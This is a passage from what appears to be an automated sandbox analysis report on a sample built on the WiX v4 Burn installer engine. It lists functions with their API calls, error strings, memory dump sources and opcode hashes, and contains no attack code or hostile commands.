                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: 64b8240f8654ef4f71285043f57b475e91d46ec5dbb3eb6fa43023f9c51cd1ec
                                                                                                                                                                  • Instruction ID: 4fa6472f9d37da6642e1cc914fa970ad54ac6cfeb9552ee4af0bd7cfb4b9d453
                                                                                                                                                                  • Opcode Fuzzy Hash: 64b8240f8654ef4f71285043f57b475e91d46ec5dbb3eb6fa43023f9c51cd1ec
                                                                                                                                                                  • Instruction Fuzzy Hash: DA01A272918629EFDB158F54CC09BAEBBBCFB48B15F000629F825A22D0DB759940CB90
                                                                                                                                                                  Function 009660E0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00966165
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0096622E
                                                                                                                                                                  • __freea.LIBCMT ref: 00966295
                                                                                                                                                                    • Part of subcall function 0095F62C: HeapAlloc.KERNEL32(00000000,00961970,?,?,00961970,00000220,?,00000000,?), ref: 0095F65E
                                                                                                                                                                  • __freea.LIBCMT ref: 009662A8
                                                                                                                                                                  • __freea.LIBCMT ref: 009662B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                  • Opcode ID: 44bb19f06ba43bccef689b0c94b6ab2f5f6eff11c97c1b59c651f5db0fedfe39
                                                                                                                                                                  • Instruction ID: b17fba4436c4d91e18549d1e33d0e965b9d51f2b7365277079cef782c3bc6e8e
                                                                                                                                                                  • Opcode Fuzzy Hash: 44bb19f06ba43bccef689b0c94b6ab2f5f6eff11c97c1b59c651f5db0fedfe39
                                                                                                                                                                  • Instruction Fuzzy Hash: 4351D0B2600206AFEF219FA0CC92EBB7BADEFC5714F150529FD28D6251EB31DC508660
                                                                                                                                                                  Function 0092E01B Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 151COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092E17D
                                                                                                                                                                    • Part of subcall function 00975E1B: GetLastError.KERNEL32(?,?,0092E0CE,?,00000003,?,?), ref: 00975E3B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 0092E1AD
                                                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 0092E165
                                                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 0092E122
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092E134, 0092E1A1, 0092E1A7, 0092E1BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 1452528299-112932794
                                                                                                                                                                  • Opcode ID: 443d6224e205f0b7163bad6fa8feea297fc0b098f83be4f645c6ec7b01f11bdd
                                                                                                                                                                  • Instruction ID: 78d9a7592500f6cbf6f39deced67c41eacb83541a62aade8b393d22fd4d10238
                                                                                                                                                                  • Opcode Fuzzy Hash: 443d6224e205f0b7163bad6fa8feea297fc0b098f83be4f645c6ec7b01f11bdd
                                                                                                                                                                  • Instruction Fuzzy Hash: 12419271F44229ABDB10DAA4DC85FAEB7B8AF08750F014125FA04FB295D774EC14CBA4
                                                                                                                                                                  Function 00971A57 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                  • API String ID: 1357844191-3295944732
                                                                                                                                                                  • Opcode ID: c7f5e1623885a4d59bbf7255b666de71adb142f93d6106a20bb70ac11284c7b1
                                                                                                                                                                  • Instruction ID: 6fbffaab6f42cea4895aa404427d02bb6a303cba26af5316a1d062ed4debd5b2
                                                                                                                                                                  • Opcode Fuzzy Hash: c7f5e1623885a4d59bbf7255b666de71adb142f93d6106a20bb70ac11284c7b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 0921A7B2B443147BDB245F5D9CC6F677A9CDBD9710F01816AFD089B386D6B4C84086E4
                                                                                                                                                                  Function 0097BBF2 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000005,00000000,?,00000000,?,?,00977C49,?,00978702,?,00000000,HEAD,00000000,00000000,00978702), ref: 0097BC0A
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,?,?,00977C49,?,00978702,?,00000000,HEAD,00000000,00000000,00978702,00000000,?), ref: 0097BC56
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to get content length string for internet file handle$Failed to parse size for internet file handle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
                                                                                                                                                                  • API String ID: 1452528299-1743952032
                                                                                                                                                                  • Opcode ID: 3fd11ae7e88eeec02693fb116ca19a3f8318198ab78a86c8bbb326ed9b736870
                                                                                                                                                                  • Instruction ID: 51a2563087da0352bf3371925a513769c369f8cb1c6135d14c1bc197526fee73
                                                                                                                                                                  • Opcode Fuzzy Hash: 3fd11ae7e88eeec02693fb116ca19a3f8318198ab78a86c8bbb326ed9b736870
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A11E933F40238B7DB3262489C0BFEF69689F85B50F158151BE9CBA1D1DBB18D01A2E0
                                                                                                                                                                  Function 00955051 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00955061
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 009550E8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 00955079
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 0095508B
                                                                                                                                                                  • Failed to set feed download URL., xrefs: 009550BC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set feed download URL.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                  • API String ID: 3168844106-105427012
                                                                                                                                                                  • Opcode ID: 03deeb515e74cd4c32b0de7b1899a8b94b64f22ae5439deaf2b280fa1844d90c
                                                                                                                                                                  • Instruction ID: 12cb9abbc6747acb1287002f8aa81e52b05b9801222870f20428e195344b2c25
                                                                                                                                                                  • Opcode Fuzzy Hash: 03deeb515e74cd4c32b0de7b1899a8b94b64f22ae5439deaf2b280fa1844d90c
                                                                                                                                                                  • Instruction Fuzzy Hash: 9601ED32780A1A77EA21A7358C1AFA7B25CAB14762F024111F90DAA1C2E6B0F84487F1
                                                                                                                                                                  Function 0091A9CE Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0091A9DA
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0091AA62
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 0091AA40
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091AA14
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091AA52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1616145386
                                                                                                                                                                  • Opcode ID: 2faedbff6f91abea19677288bcc5f2e03b777c8ae396eda67e9d2a7439c6e45c
                                                                                                                                                                  • Instruction ID: ea199a19eeecc70c5eed9245a9e214bb20e60e5ed733eb46ac9376f71d8b8c2b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2faedbff6f91abea19677288bcc5f2e03b777c8ae396eda67e9d2a7439c6e45c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C01C832B8222CBBCF215F40CD09FDE3A69AF14765F018150FA04AA1A1D775DD90DBD5
                                                                                                                                                                  Function 0091A805 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0091A811
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0091A896
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 0091A874
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A84B
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A886
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1964378859
                                                                                                                                                                  • Opcode ID: f0d6760b413e12e684aaf7307aec70c5e4369e6d3c4e9345c9ad107c9c83596f
                                                                                                                                                                  • Instruction ID: c9a4259f156f07590c071ef08d9cc4a92630c9e205253229d1ade538497861f3
                                                                                                                                                                  • Opcode Fuzzy Hash: f0d6760b413e12e684aaf7307aec70c5e4369e6d3c4e9345c9ad107c9c83596f
                                                                                                                                                                  • Instruction Fuzzy Hash: EF01C872B4221CBBCF225F80CC0AFDE3A58DB44764F0141A0FE04AA291D375DD919791
                                                                                                                                                                  Function 009115C8 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009115D8
                                                                                                                                                                    • Part of subcall function 009113DA: GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
                                                                                                                                                                    • Part of subcall function 009113DA: GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
                                                                                                                                                                  • SetDefaultDllDirectories.KERNELBASE ref: 009115FA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911600
                                                                                                                                                                  • SetDllDirectoryW.KERNEL32 ref: 0091161D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 0091162B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2226491684-0
                                                                                                                                                                  • Opcode ID: 4a20aa905897366dd8e8527b0c7e808cafe89770dad04fedb875cb5773873e9f
                                                                                                                                                                  • Instruction ID: 67dea06dda801c79dd3a5c4dcb2b99c5751895ccc15700ec1f54f5f649cda6db
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a20aa905897366dd8e8527b0c7e808cafe89770dad04fedb875cb5773873e9f
                                                                                                                                                                  • Instruction Fuzzy Hash: C401803272111DBBDB216F21DC099AE7B3DEFC1B907154015E5196B124DA319C829FE0
                                                                                                                                                                  Function 0091A941 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,0091D253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0091D44C,00000001), ref: 0091A94D
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,0091D253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0091D44C), ref: 0091A9C1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 0091A99F
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A973
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A9B1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3684767681
                                                                                                                                                                  • Opcode ID: 6c94a38dc11e91d48e1f6d004f02dd05c4762ee1a3bef5a42aad7c7f76adcb07
                                                                                                                                                                  • Instruction ID: b124c1e6031399c41b8f1d0e0594d364e31ab37bc0086076f0d4a35c25c11faa
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c94a38dc11e91d48e1f6d004f02dd05c4762ee1a3bef5a42aad7c7f76adcb07
                                                                                                                                                                  • Instruction Fuzzy Hash: 9001847278121CBBDF116F40CC0AFDE3F58AB047A4F114010FD04A92A1D6B59E909B91
                                                                                                                                                                  Function 009560EC Relevance: 7.5, APIs: 5, Instructions: 38fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(009560E3,?,00000000,?,009560E3,00000000), ref: 00956100
                                                                                                                                                                  • CloseHandle.KERNEL32(0CC2C95B,?,00000000,?,009560E3,00000000), ref: 00956110
                                                                                                                                                                  • CloseHandle.KERNEL32(EC8B5500,?,00000000,?,009560E3,00000000), ref: 00956121
                                                                                                                                                                  • CloseHandle.KERNEL32(08758B56,?,00000000,?,009560E3,00000000), ref: 00956132
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(5974F685,00000000,?,009560E3,00000000), ref: 00956144
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                  • Opcode ID: d8c40e74911e49bf944f1febca2d2f5f6fae134c1a11daa55fc69d4a432097c8
                                                                                                                                                                  • Instruction ID: 2705bf42445f992fcf8cc938951c2374432a368ec0f4467262239bca1654a1dc
                                                                                                                                                                  • Opcode Fuzzy Hash: d8c40e74911e49bf944f1febca2d2f5f6fae134c1a11daa55fc69d4a432097c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 2001E83241AF01DFC7229F16DD04826FBF9FF94752354892DE8AA53525D731A885EF40
                                                                                                                                                                  Function 0094E664 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,89504689,000000FF,?,000000FF,00916DEA,00000000,00916CF2,00917162,00916DEA,00916EDE,00000000,00000000,00916CF2,00000000), ref: 0094E6B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix4\wix4\src\burn\engine\detect.cpp
                                                                                                                                                                  • API String ID: 1825529933-3048877371
                                                                                                                                                                  • Opcode ID: db211a187f037ce87c77695fdb5f0c1bbd8a482db7c3cad6e6690582f28e19f3
                                                                                                                                                                  • Instruction ID: c61a576443ab1c2fd03cf68cedfbd45fd2f57bdcc0be82b892ff649ebcf4e3aa
                                                                                                                                                                  • Opcode Fuzzy Hash: db211a187f037ce87c77695fdb5f0c1bbd8a482db7c3cad6e6690582f28e19f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 2641B232A00710FFDB219FA8CC41FAABBF9FF48314F104929F655A2591D771A950DB50
                                                                                                                                                                  Function 00930BBA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy provider key for compatible entry., xrefs: 00930C9E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930CB0, 00930CF3
                                                                                                                                                                  • Failed to get provider information for compatible package: %ls, xrefs: 00930CE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                  • API String ID: 3535843008-4100048506
                                                                                                                                                                  • Opcode ID: b49c4d33765fb02db1fc43c5446dc75bbac96e574c97b887cb258c20a9c50fcb
                                                                                                                                                                  • Instruction ID: 57de3100451256e5f9218a0e9e0f321623ba9f4fedc0eb230d0465553c7846d7
                                                                                                                                                                  • Opcode Fuzzy Hash: b49c4d33765fb02db1fc43c5446dc75bbac96e574c97b887cb258c20a9c50fcb
                                                                                                                                                                  • Instruction Fuzzy Hash: C6414F71E4021AFFDB14DFA4CC91BEEBBB4BB44710F104669E529E7280E274A950DFA0
